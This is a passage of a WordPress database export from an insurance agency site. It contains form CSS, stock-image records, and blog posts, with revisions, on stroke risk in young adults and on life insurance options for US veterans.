.gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}	\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-13 15:09:22','2023-03-13 15:09:22','',35,'http://cmdev-site1.com/?p=294',0,'revision','',0),(295,3,'2023-03-14 12:42:58','2023-03-14 12:42:58','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nWhen we think of our youth, we think of all the dangerous stunts we accomplished during it—somersaults, handstands, backflips, and a few stories you don’t ever plan on telling your mother.\r\n\r\nHowever, despite the appearance of invincibility our youth provides, there is a silent threat growing in number—strokes.\r\n<h3>Are Young People Really at Risk of Having a Stroke?</h3>\r\nThe short answer is yes. Even though the overall rate of stroke is decreasing, strokes are on the rise in young and middle aged people, with “most experts considering a young stroke age to be under 45.”<sup>1</sup>\r\n\r\nWhile for most young people, the thought of having a stroke seems like an impossibility, an estimated 10% of all strokes occur in people under age 45.<sup>2</sup>\r\n\r\nAs for what causes strokes in young people, Dr. Buletko, MD at the Cleveland Clinic, states, “Illicit drug use and genetic conditions certainly account for some of the strokes we see in younger populations. Beyond that, the causes of stroke in younger adults mirror the causes in adults.”<sup>3</sup>\r\n\r\nAccording to Sanford Health Care, smoking also plays a role in strokes in young people, with high blood pressure, diabetes, and rare genetic conditions also playing a role in the risk of stroke for young people.<sup>2</sup>\r\n<h3>How Are Strokes in Young People Different?</h3>\r\nIt’s only natural to assume strokes in young people differ from strokes in older people. In fact, “Compared with strokes in older people, [a] stroke in the young is a different beast,” says S. Ausim Azizi, MD, Ph.D., a professor and the chair of neurology at Temple University Medical School in Philadelphia.<sup>1</sup>\r\n\r\nOne reason for this is due to the fact that strokes in young people can mean a “lifetime of recovery” and “loss of many productive years.”<sup>1</sup> With 15 to 30 percent of people who have had a stroke facing some sort of long-term disability, having a stroke while young can be absolutely devastating.<sup>1</sup>\r\n\r\nAnother way strokes in young people may differ is their cause. While 80 to 85 percent of all strokes at any age are caused by a clot blocking blood flow to the brain, strokes in young people can result from illicit drug use and smoking—something not nearly as common with strokes in older people.<sup>3</sup>\r\n\r\nHowever, despite some differences in severity and cause, most strokes have the same risk factors, which is why it’s paramount that young people maintain a healthy lifestyle. Some common causes for stroke (at any age) are as follows:<sup>3</sup>\r\n\r\nHigh blood pressure\r\nHigh cholesterol\r\nDiabetes\r\nSmoking\r\nObesity\r\nAbnormal heart structures\r\n<h3>Treating Strokes in Young People</h3>\r\nWhile the first line of treatment in a stroke for young people is the same as seen in older populations, stokes in young people can sometimes be harder to identify—making it more difficult for young people to seek treatment after a stroke.\r\n\r\nDr. Buletko states that a severe onset of a headache may be the first warning sign of a hemorrhagic stroke for young people, with pain characterized as “the worst headache of your life” or a “thunderclap feeling in your head” as a sign of possibly needing immediate medical attention.<sup>1</sup>\r\n\r\nOther symptoms can include vision loss, double vision, slurred speech, dizziness, or difficulty walking<sup>2</sup>—something many young people write off without there being more common stroke symptoms, such as a facial droop and weakness on one side of the body.<sup>2</sup>\r\n\r\nAll in all, strokes in young people are difficult to identify due to a lack of recognition that a stroke can happen to someone at any age. With the exception of a few additional factors causing strokes in young people, strokes in young people look the same as strokes in older populations.\r\n\r\nMaintaining a healthy lifestyle is key to possibly preventing a stroke, but there is. Unfortunately, no way to guarantee a stroke won’t happen to you. For this reason, it is recommended you familiarize yourself with stroke warning signs, which can simply be remembered by the acronym BE FAST.\r\n<h3>BE FAST stands for:</h3>\r\nBalance: A sudden loss of balance and coordination\r\nEyes: Sudden vision loss in one or both eyes and/or double vision\r\nFace: Any drooping on one side of the face\r\nArms: Sudden weakness in one arm or leg\r\nSpeech: Slurring, difficulty speaking, or difficulty understanding words\r\nTime: Quickly call 911 if you or someone you know is experiencing any of these symptoms<sup>3</sup>\r\n\r\nNo matter your age, BE FAST could save your life, so make sure to keep this acronym fresh in your memory!\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Everyday Health, Think You’re Too Young for a Stroke? Think Again, 2017, <a href=\"https://www.everydayhealth.com/news/think-youre-too-young-stroke/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.everydayhealth.com/news/think-youre-too-young-stroke/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Stanford Health Care, Stroke in Young People, 2020, <a href=\"https://stanfordhealthcare.org/medical-conditions/brain-and-nerves/stroke/stroke-in-young-people.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://stanfordhealthcare.org/medical-conditions/brain-and-nerves/stroke/stroke-in-young-people.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Cleveland Clinic, Why Are Strokes on the Rise in Younger People?, 2019, <a href=\"https://health.clevelandclinic.org/why-are-strokes-on-the-rise-in-younger-people/\" target=\"_blank\" rel=\"noopener noreferrer\">https://health.clevelandclinic.org/why-are-strokes-on-the-rise-in-younger-people/</a></span></em>','The Risk Of Having A Stroke For People Under 40','','publish','open','open','','the-risk-of-having-a-stroke-for-people-under-40','','','2023-03-19 17:46:50','2023-03-19 17:46:50','',0,'http://cmdev-site1.com/?p=295',0,'post','',0),(296,3,'2023-03-14 12:42:18','2023-03-14 12:42:18','closeup view of an ecg ekg monitor on a operating room','ecg ekg monitor','','inherit','open','closed','','ecg-ekg-monitor','','','2023-03-14 12:42:39','2023-03-14 12:42:39','',295,'http://cmdev-site1.com/wp-content/uploads/2023/03/closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1.jpg',0,'attachment','image/jpeg',0),(297,3,'2023-03-14 12:42:43','2023-03-14 12:42:43','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nWhen we think of our youth, we think of all the dangerous stunts we accomplished during it—somersaults, handstands, backflips, and a few stories you don’t ever plan on telling your mother.\r\n\r\nHowever, despite the appearance of invincibility our youth provides, there is a silent threat growing in number—strokes.\r\n<h3>Are Young People Really at Risk of Having a Stroke?</h3>\r\nThe short answer is yes. Even though the overall rate of stroke is decreasing, strokes are on the rise in young and middle aged people, with “most experts considering a young stroke age to be under 45.”<sup>1</sup>\r\n\r\nWhile for most young people, the thought of having a stroke seems like an impossibility, an estimated 10% of all strokes occur in people under age 45.<sup>2</sup>\r\n\r\nAs for what causes strokes in young people, Dr. Buletko, MD at the Cleveland Clinic, states, “Illicit drug use and genetic conditions certainly account for some of the strokes we see in younger populations. Beyond that, the causes of stroke in younger adults mirror the causes in adults.”<sup>3</sup>\r\n\r\nAccording to Sanford Health Care, smoking also plays a role in strokes in young people, with high blood pressure, diabetes, and rare genetic conditions also playing a role in the risk of stroke for young people.<sup>2</sup>\r\n<h3>How Are Strokes in Young People Different?</h3>\r\nIt’s only natural to assume strokes in young people differ from strokes in older people. In fact, “Compared with strokes in older people, [a] stroke in the young is a different beast,” says S. Ausim Azizi, MD, Ph.D., a professor and the chair of neurology at Temple University Medical School in Philadelphia.<sup>1</sup>\r\n\r\nOne reason for this is due to the fact that strokes in young people can mean a “lifetime of recovery” and “loss of many productive years.”<sup>1</sup> With 15 to 30 percent of people who have had a stroke facing some sort of long-term disability, having a stroke while young can be absolutely devastating.<sup>1</sup>\r\n\r\nAnother way strokes in young people may differ is their cause. While 80 to 85 percent of all strokes at any age are caused by a clot blocking blood flow to the brain, strokes in young people can result from illicit drug use and smoking—something not nearly as common with strokes in older people.<sup>3</sup>\r\n\r\nHowever, despite some differences in severity and cause, most strokes have the same risk factors, which is why it’s paramount that young people maintain a healthy lifestyle. Some common causes for stroke (at any age) are as follows:<sup>3</sup>\r\n\r\nHigh blood pressure\r\nHigh cholesterol\r\nDiabetes\r\nSmoking\r\nObesity\r\nAbnormal heart structures\r\n<h3>Treating Strokes in Young People</h3>\r\nWhile the first line of treatment in a stroke for young people is the same as seen in older populations, stokes in young people can sometimes be harder to identify—making it more difficult for young people to seek treatment after a stroke.\r\n\r\nDr. Buletko states that a severe onset of a headache may be the first warning sign of a hemorrhagic stroke for young people, with pain characterized as “the worst headache of your life” or a “thunderclap feeling in your head” as a sign of possibly needing immediate medical attention.<sup>1</sup>\r\n\r\nOther symptoms can include vision loss, double vision, slurred speech, dizziness, or difficulty walking<sup>2</sup>—something many young people write off without there being more common stroke symptoms, such as a facial droop and weakness on one side of the body.<sup>2</sup>\r\n\r\nAll in all, strokes in young people are difficult to identify due to a lack of recognition that a stroke can happen to someone at any age. With the exception of a few additional factors causing strokes in young people, strokes in young people look the same as strokes in older populations.\r\n\r\nMaintaining a healthy lifestyle is key to possibly preventing a stroke, but there is. Unfortunately, no way to guarantee a stroke won’t happen to you. For this reason, it is recommended you familiarize yourself with stroke warning signs, which can simply be remembered by the acronym BE FAST.\r\n<h3>BE FAST stands for:</h3>\r\nBalance: A sudden loss of balance and coordination\r\nEyes: Sudden vision loss in one or both eyes and/or double vision\r\nFace: Any drooping on one side of the face\r\nArms: Sudden weakness in one arm or leg\r\nSpeech: Slurring, difficulty speaking, or difficulty understanding words\r\nTime: Quickly call 911 if you or someone you know is experiencing any of these symptoms<sup>3</sup>\r\n\r\nNo matter your age, BE FAST could save your life, so make sure to keep this acronym fresh in your memory!\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Everyday Health, Think You’re Too Young for a Stroke? Think Again, 2017, <a href=\"https://www.everydayhealth.com/news/think-youre-too-young-stroke/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.everydayhealth.com/news/think-youre-too-young-stroke/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Stanford Health Care, Stroke in Young People, 2020, <a href=\"https://stanfordhealthcare.org/medical-conditions/brain-and-nerves/stroke/stroke-in-young-people.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://stanfordhealthcare.org/medical-conditions/brain-and-nerves/stroke/stroke-in-young-people.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Cleveland Clinic, Why Are Strokes on the Rise in Younger People?, 2019, <a href=\"https://health.clevelandclinic.org/why-are-strokes-on-the-rise-in-younger-people/\" target=\"_blank\" rel=\"noopener noreferrer\">https://health.clevelandclinic.org/why-are-strokes-on-the-rise-in-younger-people/</a></span></em>','The Risk Of Having A Stroke For People Under 40','','inherit','closed','closed','','295-revision-v1','','','2023-03-14 12:42:43','2023-03-14 12:42:43','',295,'http://cmdev-site1.com/?p=297',0,'revision','',0),(298,3,'2023-03-14 13:12:15','2023-03-14 13:12:15','happy military family of three relaxing together at home','military family of three relaxing together','','inherit','open','closed','','military-family-of-three-relaxing-together','','','2023-03-14 13:16:40','2023-03-14 13:16:40','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Military-Soldier-Veteran-Child-and-Spouse-1000x667-1.jpg',0,'attachment','image/jpeg',0),(299,3,'2023-03-14 13:12:20','2023-03-14 13:12:20','Stay safe. Text in white light box, with a background of sweater, dried leaves halloween autumn decoration. Coronavirus devices. Social distancing. Protection against pandemics. Cozy home','Stay safe. Text in white light box, with a background of sweater, dried leaves halloween autumn decoration. Coronavirus devices. Social distancing. Protection against pandemics','','inherit','open','closed','','stay-safe-text-in-white-light-box-with-a-background-of-sweater-dried-leaves-halloween-autumn-decoration-coronavirus-devices-social-distancing-protection-against-pandemics','','','2023-03-14 13:33:57','2023-03-14 13:33:57','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Stay-safe-Halloween-autumn-decoration-1000x667-1.jpg',0,'attachment','image/jpeg',0),(300,3,'2023-03-14 13:12:25','2023-03-14 13:12:25','little adorable african american grandchild whispering to her smiling grandfather while sitting on bench in park','little adorable african american grandchild whispering to her sm','','inherit','open','closed','','little-adorable-african-american-grandchild-whispering-to-her-sm','','','2023-03-14 13:39:24','2023-03-14 13:39:24','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/grandchild-whispering-to-her-smiling-grandfather-1000x667-1.jpg',0,'attachment','image/jpeg',0),(301,3,'2023-03-14 13:12:29','2023-03-14 13:12:29','Young people sitting at cafe table and having coffee together. Group of friends making a toast with coffee.','Group of friends at cafe having coffee together','','inherit','open','closed','','group-of-friends-at-cafe-having-coffee-together','','','2023-03-14 13:44:18','2023-03-14 13:44:18','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Group-of-friends-at-cafe-having-coffee-together-1000x660-1.jpg',0,'attachment','image/jpeg',0),(302,3,'2023-03-14 13:12:33','2023-03-14 13:12:33','credit score concept on the screen of smartphone, checking payment history and ranking in bank','credit score concept on the screen of smartphone, checking payme','','inherit','open','closed','','credit-score-concept-on-the-screen-of-smartphone-checking-payme','','','2023-03-14 13:49:30','2023-03-14 13:49:30','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/credit-score-screen-of-smartphone-1000x667-1.jpg',0,'attachment','image/jpeg',0),(303,3,'2023-03-14 13:12:40','2023-03-14 13:12:40','A house sold sign with trees in the background ','sold sign in front of house or condo','','inherit','open','closed','','sold-sign-in-front-of-house-or-condo','','','2023-03-14 13:54:02','2023-03-14 13:54:02','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/For-Sale-1000x669-1.jpg',0,'attachment','image/jpeg',0),(304,3,'2023-03-14 13:12:45','2023-03-14 13:12:45','Candid shot of focused beautiful young African housewife wearing headband and casual shirt paying utility bills online using laptop computer, sitting at kitchen table with papers and smiling','Candid shot of focused beautiful young African housewife wearing headband and casual shirt paying utility bills online using laptop computer, sitting at kitchen table with papers and smiling','','inherit','open','closed','','candid-shot-of-focused-beautiful-young-african-housewife-wearing-headband-and-casual-shirt-paying-utility-bills-online-using-laptop-computer-sitting-at-kitchen-table-with-papers-and-smiling','','','2023-03-14 13:58:47','2023-03-14 13:58:47','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1.jpg',0,'attachment','image/jpeg',0),(305,3,'2023-03-14 13:12:59','2023-03-14 13:12:59','Burial Insurance memo.','Burial Insurance memo on the green sheet and money.','','inherit','open','closed','','burial-insurance-memo-on-the-green-sheet-and-money','','','2023-03-14 14:13:16','2023-03-14 14:13:16','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Burial-Insurance-1000x667-1.jpg',0,'attachment','image/jpeg',0),(306,3,'2023-03-14 13:21:12','2023-03-14 13:21:12','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nVeterans put their lives on the line, fighting to protect our way of life and rights as everyday Americans. For this reason and more, it’s paramount we serve our veterans as well as they served us, and one way to do this is through providing life insurance.\r\n\r\nLife insurance plays a pivotal role in providing financial protection for families all around the globe. For veterans, life insurance can make all the difference by providing their families with long-term financial security given the “extraordinary risks involved in military service.”<sup>1\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h3>Life Insurance Options for Veterans</h3>\r\nLife insurance is a valuable asset for many Americans, especially for veterans. So, when it comes to selecting a life insurance option, it’s important veterans be informed of their options. For veterans, there are two main options for securing life insurance. Veterans can either purchase life insurance from the public, government funded sector or in the private sector.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Servicemembers’ Group Life Insurance (SGLI)</h4>\r\nSGLI is a public life insurance option given to all military service personnel after enrolling in the military. SGLI offers military personal maximum coverage up to $400,000 and includes traumatic injury protection.<sup>2</sup> However, SGLI only lasts for 120 days after service has ended, meaning that military personnel will have to find another form of life insurance coverage in the public or private sector after SGLI has expired.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Servicemembers’ Group Disability Extension Life Insurance (SGLI - DE)</h4>\r\nUnlike other life insurance options, SGLI - DE is an extension of SGLI offered only to servicemembers rendered “totally disabled at the time of discharge.”<sup>2</sup> Those who qualify for SGLI - E may apply to keep their SGLI coverage for an additional two years after their initial service separation date.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Service - Disabled Veterans Insurance (S -DVI)</h4>\r\nS - DVI is a life insurance program provided to eligible military veterans who have received a “service-connected disability rating” from the VA.<sup>2</sup> S - DVI provides veterans with $10,000 in life insurance coverage, and veterans who qualify may also be able to apply for a premium waiver.<sup>2</sup> For veterans who qualify, they may be able to receive an additional $30,000 in life insurance coverage.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Veterans Group Life Insurance (VGLI)</h4>\r\nThe most common life insurance option for veterans is the VGLI, which is designed to help former servicemembers convert from SGLI to a “civilian program of lifetime renewable term coverage after separation from service.”<sup>1</sup> One of the main benefits of VGLI includes allowing veterans to receive up to 50% of their life insurance proceeds early if they have a life expectancy of nine months or less.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h3>Private Sector</h3>\r\nIf public life insurance isn’t fit for your situation as a US veteran or family member of a US veteran, there are other life insurance options available—namely in the private sector.\r\n\r\nThere are a number of ways to convert from the public, military provided life insurance to private life insurance, but one of the most common methods involves switching from SGLI to private health insurance immediately after SGLI expires (120 days after service has ended).<sup>2</sup>\r\n\r\nTo prevent any gaps in coverage, it’s vital that those looking to transition to private life insurance start any applications needed as soon as possible.\r\n\r\nAnother option veterans have is to transition from SGLI to VGLI, allowing veterans and their families time to explore, consider, and settle on a private life insurance policy without risking gaps in coverage.<sup>2</sup>\r\n\r\nHowever, like public life insurance, private life insurance comes in a number of different shapes and sizes. For this reason, it is recommended that veterans considering a private life insurance policy explore the different types of private life insurance options available, like term and whole life insurance.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Term Life Insurance</h4>\r\nTerm life insurance provides the insured with a predetermined death benefit and covers the insured for a set number of years.<sup>3</sup> The number of years in which the insured is under the policy is called a “term.”\r\n\r\nAfter the term of the policy, the insured will have to decide whether to renew their term life policy for another term. Annual premiums are typically offered at a fixed rate, and the death benefit only pays out if the insured dies during the designated term period.\r\n\r\nTerm life insurance is often the least expensive of life insurance available.<sup>3\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Permanent Life Insurance</h4>\r\nPermanent life insurance provides the insured with a death benefit as well as a cash value component.<sup>3</sup> In other words, the premiums the insured pays go towards the policy while acquiring cash value, which the insured can then access to help supplement their income or make payments while they’re still alive.<sup>3</sup>\r\n\r\nPermanent life insurance is designed to cover the insured for as long as they are alive, meaning that the insured doesn’t have to worry about their policy expiring at the end of a term or needing to renew.\r\n\r\nIn closing, there are a number of different options veterans can pursue when considering a life insurance policy.\r\n\r\nHowever, what they ultimately decide should be based on what’s best for them and their own financial well-being. We suggest consulting a financial advisor to help advise you during your decision making process.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. U.S. Department of Veterans Affairs, Life Insurance, 2019, <a href=\"https://www.benefits.va.gov/insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.benefits.va.gov/insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Investopedia, Life Insurance for Veterans, 2019, <a href=\"https://www.policygenius.com/life-insurance/life-insurance-for-veterans/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.policygenius.com/life-insurance/life-insurance-for-veterans/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Investopedia, The Best Type of Life Insurance For You Right Now, 2019, <a href=\"https://www.investopedia.com/financial-edge/0312/the-best-type-of-life-insurance-for-you-right-now.aspx\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/financial-edge/0312/the-best-type-of-life-insurance-for-you-right-now.aspx</a></span></em>','Beyond Active Duty: Life Insurance Options For US Veterans','','publish','open','open','','beyond-active-duty-life-insurance-options-for-us-veterans','','','2023-03-19 17:47:16','2023-03-19 17:47:16','',0,'http://cmdev-site1.com/?p=306',0,'post','',0),(309,3,'2023-03-14 13:20:56','2023-03-14 13:20:56','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nVeterans put their lives on the line, fighting to protect our way of life and rights as everyday Americans. For this reason and more, it’s paramount we serve our veterans as well as they served us, and one way to do this is through providing life insurance.\r\n\r\nLife insurance plays a pivotal role in providing financial protection for families all around the globe. For veterans, life insurance can make all the difference by providing their families with long-term financial security given the “extraordinary risks involved in military service.”<sup>1\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h3>Life Insurance Options for Veterans</h3>\r\nLife insurance is a valuable asset for many Americans, especially for veterans. So, when it comes to selecting a life insurance option, it’s important veterans be informed of their options. For veterans, there are two main options for securing life insurance. Veterans can either purchase life insurance from the public, government funded sector or in the private sector.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Servicemembers’ Group Life Insurance (SGLI)</h4>\r\nSGLI is a public life insurance option given to all military service personnel after enrolling in the military. SGLI offers military personal maximum coverage up to $400,000 and includes traumatic injury protection.<sup>2</sup> However, SGLI only lasts for 120 days after service has ended, meaning that military personnel will have to find another form of life insurance coverage in the public or private sector after SGLI has expired.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Servicemembers’ Group Disability Extension Life Insurance (SGLI - DE)</h4>\r\nUnlike other life insurance options, SGLI - DE is an extension of SGLI offered only to servicemembers rendered “totally disabled at the time of discharge.”<sup>2</sup> Those who qualify for SGLI - E may apply to keep their SGLI coverage for an additional two years after their initial service separation date.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Service - Disabled Veterans Insurance (S -DVI)</h4>\r\nS - DVI is a life insurance program provided to eligible military veterans who have received a “service-connected disability rating” from the VA.<sup>2</sup> S - DVI provides veterans with $10,000 in life insurance coverage, and veterans who qualify may also be able to apply for a premium waiver.<sup>2</sup> For veterans who qualify, they may be able to receive an additional $30,000 in life insurance coverage.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Veterans Group Life Insurance (VGLI)</h4>\r\nThe most common life insurance option for veterans is the VGLI, which is designed to help former servicemembers convert from SGLI to a “civilian program of lifetime renewable term coverage after separation from service.”<sup>1</sup> One of the main benefits of VGLI includes allowing veterans to receive up to 50% of their life insurance proceeds early if they have a life expectancy of nine months or less.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h3>Private Sector</h3>\r\nIf public life insurance isn’t fit for your situation as a US veteran or family member of a US veteran, there are other life insurance options available—namely in the private sector.\r\n\r\nThere are a number of ways to convert from the public, military provided life insurance to private life insurance, but one of the most common methods involves switching from SGLI to private health insurance immediately after SGLI expires (120 days after service has ended).<sup>2</sup>\r\n\r\nTo prevent any gaps in coverage, it’s vital that those looking to transition to private life insurance start any applications needed as soon as possible.\r\n\r\nAnother option veterans have is to transition from SGLI to VGLI, allowing veterans and their families time to explore, consider, and settle on a private life insurance policy without risking gaps in coverage.<sup>2</sup>\r\n\r\nHowever, like public life insurance, private life insurance comes in a number of different shapes and sizes. For this reason, it is recommended that veterans considering a private life insurance policy explore the different types of private life insurance options available, like term and whole life insurance.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Term Life Insurance</h4>\r\nTerm life insurance provides the insured with a predetermined death benefit and covers the insured for a set number of years.<sup>3</sup> The number of years in which the insured is under the policy is called a “term.”\r\n\r\nAfter the term of the policy, the insured will have to decide whether to renew their term life policy for another term. Annual premiums are typically offered at a fixed rate, and the death benefit only pays out if the insured dies during the designated term period.\r\n\r\nTerm life insurance is often the least expensive of life insurance available.<sup>3\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Permanent Life Insurance</h4>\r\nPermanent life insurance provides the insured with a death benefit as well as a cash value component.<sup>3</sup> In other words, the premiums the insured pays go towards the policy while acquiring cash value, which the insured can then access to help supplement their income or make payments while they’re still alive.<sup>3</sup>\r\n\r\nPermanent life insurance is designed to cover the insured for as long as they are alive, meaning that the insured doesn’t have to worry about their policy expiring at the end of a term or needing to renew.\r\n\r\nIn closing, there are a number of different options veterans can pursue when considering a life insurance policy.\r\n\r\nHowever, what they ultimately decide should be based on what’s best for them and their own financial well-being. We suggest consulting a financial advisor to help advise you during your decision making process.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. U.S. Department of Veterans Affairs, Life Insurance, 2019, <a href=\"https://www.benefits.va.gov/insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.benefits.va.gov/insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Investopedia, Life Insurance for Veterans, 2019, <a href=\"https://www.policygenius.com/life-insurance/life-insurance-for-veterans/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.policygenius.com/life-insurance/life-insurance-for-veterans/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Investopedia, The Best Type of Life Insurance For You Right Now, 2019, <a href=\"https://www.investopedia.com/financial-edge/0312/the-best-type-of-life-insurance-for-you-right-now.aspx\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/financial-edge/0312/the-best-type-of-life-insurance-for-you-right-now.aspx</a></span></em>','Beyond Active Duty: Life Insurance Options For US Veterans','','inherit','closed','closed','','306-revision-v1','','','2023-03-14 13:20:56','2023-03-14 13:20:56','',306,'http://cmdev-site1.com/?p=309',0,'revision','',0),(308,3,'2023-03-14 13:19:05','2023-03-14 13:19:05','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nVeterans put their lives on the line, fighting to protect our way of life and rights as everyday Americans. For this reason and more, it’s paramount we serve our veterans as well as they served us, and one way to do this is through providing life insurance.\r\n\r\nLife insurance plays a pivotal role in providing financial protection for families all around the globe. For veterans, life insurance can make all the difference by providing their families with long-term financial security given the “extraordinary risks involved in military service.”<sup>1</sup>\r\n<h3>Life Insurance Options for Veterans</h3>\r\nLife insurance is a valuable asset for many Americans, especially for veterans. So, when it comes to selecting a life insurance option, it’s important veterans be informed of their options. For veterans, there are two main options for securing life insurance. Veterans can either purchase life insurance from the public, government funded sector or in the private sector.<sup>2</sup>\r\n<h4>Servicemembers’ Group Life Insurance (SGLI)</h4>\r\nSGLI is a public life insurance option given to all military service personnel after enrolling in the military. SGLI offers military personal maximum coverage up to $400,000 and includes traumatic injury protection.<sup>2</sup> However, SGLI only lasts for 120 days after service has ended, meaning that military personnel will have to find another form of life insurance coverage in the public or private sector after SGLI has expired.\r\n<h4>Servicemembers’ Group Disability Extension Life Insurance (SGLI - DE)</h4>\r\nUnlike other life insurance options, SGLI - DE is an extension of SGLI offered only to servicemembers rendered “totally disabled at the time of discharge.”<sup>2</sup> Those who qualify for SGLI - E may apply to keep their SGLI coverage for an additional two years after their initial service separation date.<sup>2</sup>\r\n<h4>Service - Disabled Veterans Insurance (S -DVI)</h4>\r\nS - DVI is a life insurance program provided to eligible military veterans who have received a “service-connected disability rating” from the VA.<sup>2</sup> S - DVI provides veterans with $10,000 in life insurance coverage, and veterans who qualify may also be able to apply for a premium waiver.<sup>2</sup> For veterans who qualify, they may be able to receive an additional $30,000 in life insurance coverage.<sup>2</sup>\r\n<h4>Veterans Group Life Insurance (VGLI)</h4>\r\nThe most common life insurance option for veterans is the VGLI, which is designed to help former servicemembers convert from SGLI to a “civilian program of lifetime renewable term coverage after separation from service.”<sup>1</sup> One of the main benefits of VGLI includes allowing veterans to receive up to 50% of their life 